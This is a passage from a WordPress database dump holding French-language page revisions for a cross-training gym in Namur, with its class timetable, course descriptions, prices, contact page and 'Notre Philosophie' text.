class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coatching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-04 19:38:20', '2013-07-04 19:38:20', '', 11, 'http://www.crosstrainingcenter.be/11-revision-105/', 0, 'revision', '', 0),
(286, 1, '2013-07-03 20:45:05', '2013-07-03 20:45:05', '<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Prise de RDV :</h1>\r\nLes prises de RDV pour les séances de Team Training, Duo Training, Personnal Trainer ou Coatching nutritionnel se font exclusivement par téléphone.\r\n\r\n0485 / 92 . 02 . 12\r\n<h1>Adresse :</h1>\r\nBowling et Squash de Namur\r\nChaussée de Perwez 251\r\n<em id=\"__mceDel\"> 5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></em></td>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Plan d\'accès :</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n<small><a style=\"color: #0000ff; text-align: left;\" href=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;source=embed\">Agrandir le plan</a></small></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-07-03 20:45:05', '2013-07-03 20:45:05', '', 9, 'http://www.crosstrainingcenter.be/9-revision-16/', 0, 'revision', '', 0),
(287, 1, '2013-07-04 18:19:03', '2013-07-04 18:19:03', '<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Prise de RDV :</h1>\r\nLes prises de RDV pour les séances de Team Training, Duo Training, Personnal Trainer ou Coatching nutritionnel se font exclusivement par téléphone.\r\n\r\n0485 / 92 . 02 . 12\r\n<h1>&nbsp;</h1>\r\n<h1>Adresse :</h1>\r\nBowling et Squash de Namur\r\nChaussée de Perwez 251\r\n<em id=\"__mceDel\"> 5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></em></td>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Plan d\'accès :</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n<small><a style=\"color: #0000ff; text-align: left;\" href=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;source=embed\">Agrandir le plan</a></small></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-07-04 18:19:03', '2013-07-04 18:19:03', '', 9, 'http://www.crosstrainingcenter.be/9-revision-17/', 0, 'revision', '', 0),
(288, 1, '2013-07-04 18:50:46', '2013-07-04 18:50:46', '', 'illu1', '', 'inherit', 'open', 'open', '', 'illu1', '', '', '2013-07-04 18:50:46', '2013-07-04 18:50:46', '', 5, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/illu1.png', 0, 'attachment', 'image/png', 0);
INSERT INTO `www2_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(289, 1, '2013-07-03 20:45:08', '2013-07-03 20:45:08', '<h2>Assurer un entraînement de qualité :</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-102 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a>Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2></h2>\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"size-medium wp-image-103 alignleft\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a>Afin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-03 20:45:08', '2013-07-03 20:45:08', '', 5, 'http://www.crosstrainingcenter.be/5-revision-35/', 0, 'revision', '', 0),
(290, 1, '2013-07-04 18:51:42', '2013-07-04 18:51:42', '<h2>Assurer un entraînement de qualité :</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/illu1.png\"><img class=\"size-full wp-image-288 alignleft\" alt=\"illu1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/illu1.png\" width=\"271\" height=\"197\" /></a>Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2></h2>\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"size-medium wp-image-103 alignleft\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a>Afin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 18:51:42', '2013-07-04 18:51:42', '', 5, 'http://www.crosstrainingcenter.be/5-revision-36/', 0, 'revision', '', 0),
(292, 1, '2013-07-04 18:52:28', '2013-07-04 18:52:28', '<h1>Assurer un entraînement de qualité :</h1>\r\n&nbsp;\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2></h2>\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"size-medium wp-image-103 alignleft\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a>Afin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 18:52:28', '2013-07-04 18:52:28', '', 5, 'http://www.crosstrainingcenter.be/5-revision-38/', 0, 'revision', '', 0),
(294, 1, '2013-07-04 19:00:43', '2013-07-04 19:00:43', '<h1>Assurer un entraînement de qualité :</h1>\r\n&nbsp;\r\n<blockquote>Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n<h1></h1>\r\n</blockquote>\r\n<h1>L\'activité physique, l\'alimentation et le stress : une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:00:43', '2013-07-04 19:00:43', '', 5, 'http://www.crosstrainingcenter.be/5-revision-40/', 0, 'revision', '', 0),
(295, 1, '2013-07-04 19:01:11', '2013-07-04 19:01:11', '<h1>Assurer un entraînement de qualité :</h1>\r\n&nbsp;\r\n<blockquote>\r\n<h4>Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.</h4>\r\n<h1></h1>\r\n</blockquote>\r\n<h1>L\'activité physique, l\'alimentation et le stress : une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:01:11', '2013-07-04 19:01:11', '', 5, 'http://www.crosstrainingcenter.be/5-revision-41/', 0, 'revision', '', 0),
(297, 1, '2013-07-04 19:04:28', '2013-07-04 19:04:28', '<h1>Assurer un entraînement de qualité :</h1>\r\n[caption id=\"attachment_102\" align=\"alignnone\" width=\"300\"]<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a> <br><br>Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.[/caption]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n<h1>L\'activité physique, l\'alimentation et le stress : une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:04:28', '2013-07-04 19:04:28', '', 5, 'http://www.crosstrainingcenter.be/5-revision-43/', 0, 'revision', '', 0),
(296, 1, '2013-07-04 19:02:56', '2013-07-04 19:02:56', '<h1>Assurer un entraînement de qualité :</h1>\r\n[caption id=\"attachment_102\" align=\"alignnone\" width=\"300\"]<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a> Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.[/caption]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n<h1>L\'activité physique, l\'alimentation et le stress : une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:02:56', '2013-07-04 19:02:56', '', 5, 'http://www.crosstrainingcenter.be/5-revision-42/', 0, 'revision', '', 0),
(298, 1, '2013-07-04 19:07:45', '2013-07-04 19:07:45', '<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n<h1>L\'activité physique, l\'alimentation et le stress : une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:07:45', '2013-07-04 19:07:45', '', 5, 'http://www.crosstrainingcenter.be/5-revision-44/', 0, 'revision', '', 0),
